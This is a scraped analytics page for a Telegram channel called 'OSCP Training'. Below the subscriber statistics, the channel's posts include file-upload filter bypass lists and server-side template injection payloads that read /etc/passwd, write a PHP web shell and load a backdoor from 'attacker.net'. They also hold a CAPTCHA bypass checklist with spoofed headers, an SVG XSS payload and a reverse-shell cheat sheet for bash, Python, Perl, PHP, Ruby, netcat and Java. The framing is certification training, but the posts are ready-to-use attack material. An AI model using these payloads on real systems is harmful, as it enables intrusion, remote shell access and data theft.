🔥OSCP Training🔥🛡⚔️👨🏻💻
Открыть в Telegram
Offensive Security Certified Professional @CEH_training @WebHacking @pfsense @WifiHacking 🔰For safer days
БольшеСтрана не указанаТехнологии и приложения11 688
7 490
Подписчики
Нет данных24 часа
+37 дней
-2030 дней
Загрузка данных...
Похожие каналы
Нет данных
Возникли проблемы? Пожалуйста, обновите страницу или обратитесь к нашему support-менеджеру .
Облако тегов
Нет данных
Возникли проблемы? Пожалуйста, обновите страницу или обратитесь к нашему support-менеджеру .
Входящие и исходящие упоминания
---
---
---
---
---
---
Привлечение подписчиков
март '25
март '250
в 0 каналах
февраль '25
+56
в 0 каналах
Get PRO
январь '25
+61
в 0 каналах
Get PRO
декабрь '24
+62
в 0 каналах
Get PRO
ноябрь '24
+74
в 0 каналах
Get PRO
октябрь '24
+90
в 0 каналах
Get PRO
сентябрь '24
+114
в 0 каналах
Get PRO
август '24
+156
в 0 каналах
Get PRO
июль '24
+185
в 0 каналах
Get PRO
июнь '24
+219
в 1 каналах
Get PRO
май '24
+259
в 0 каналах
Get PRO
апрель '24
+193
в 1 каналах
Get PRO
март '24
+133
в 1 каналах
Get PRO
февраль '24
+179
в 0 каналах
Get PRO
январь '24
+189
в 3 каналах
Get PRO
декабрь '23
+188
в 2 каналах
Get PRO
ноябрь '23
+176
в 0 каналах
Get PRO
октябрь '23
+154
в 1 каналах
Get PRO
сентябрь '23
+204
в 0 каналах
Get PRO
август '23
+255
в 0 каналах
Get PRO
июль '23
+297
в 0 каналах
Get PRO
июнь '23
+239
в 0 каналах
Get PRO
май '23
+266
в 0 каналах
Get PRO
апрель '23
+218
в 0 каналах
Get PRO
март '23
+244
в 0 каналах
Get PRO
февраль '23
+231
в 0 каналах
Get PRO
январь '23
+256
в 0 каналах
Get PRO
декабрь '22
+222
в 0 каналах
Get PRO
ноябрь '22
+247
в 0 каналах
Get PRO
октябрь '22
+220
в 0 каналах
Get PRO
сентябрь '22
+247
в 0 каналах
Get PRO
август '22
+199
в 0 каналах
Get PRO
июль '22
+230
в 0 каналах
Get PRO
июнь '22
+187
в 0 каналах
Get PRO
май '22
+139
в 0 каналах
Get PRO
апрель '22
+464
в 0 каналах
Get PRO
март '220
в 0 каналах
Get PRO
февраль '220
в 0 каналах
Get PRO
январь '220
в 0 каналах
Get PRO
декабрь '21
+107
в 0 каналах
Get PRO
ноябрь '21
+139
в 0 каналах
Get PRO
октябрь '21
+231
в 0 каналах
Get PRO
сентябрь '21
+120
в 0 каналах
Get PRO
август '21
+135
в 0 каналах
Get PRO
июль '21
+143
в 0 каналах
Get PRO
июнь '21
+150
в 0 каналах
Get PRO
май '21
+138
в 0 каналах
Get PRO
апрель '21
+163
в 0 каналах
Get PRO
март '21
+165
в 0 каналах
Get PRO
февраль '21
+192
в 0 каналах
Get PRO
январь '21
+247
в 0 каналах
Get PRO
декабрь '20
+1 077
в 0 каналах
| Дата | Привлечение подписчиков | Упоминания | Каналы | |
| 02 марта | 0 | |||
| 01 марта | 0 |
Посты канала
| 2 | Нет текста... | 2 574 |
| 3 | Нет текста... | 2 924 |
| 4 | Wireshark.pdf | 2 737 |
| 5 | Web Application Lab Setup Guide .pdf | 2 700 |
| 6 | OSCP Cheat Sheet-2.pdf | 3 967 |
| 7 | RedTeam Scenarios.pdf.pdf | 299 |
| 8 | OSCP Exam Report.pdf | 3 954 |
| 9 | OSCP Notes 2.pdf | 4 919 |
| 10 | Нет текста... | 4 755 |
| 11 | File Upload Bypass -
Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg | 3 953 |
| 12 | @OSCP_training
@WebHacking | 3 335 |
| 13 | SSTI (Server Side Template Injection)
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}} | 3 178 |
| 14 | Google Dorks to Find Sensitive data or dir | 2 295 |
| 15 | APIs Fuzzing for Bug Bounty.pdf | 2 863 |
| 16 | CAPTCHA Bypass
* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1 | 3 709 |
| 17 | Tryhackme.pdf | 5 849 |
| 18 | Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg> | 4 930 |
| 19 | WhatsApp'ta OSCP Training kanalını takip edin: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a | 2 745 |
| 20 | Reverse Shell Cheat Sheet
Bash;
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python;
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PERL;
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP;
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby;
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat;
nc -e /bin/sh 10.0.0.1 1234
Java;
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm;
xterm -display 10.0.0.1:1 | 3 037 |
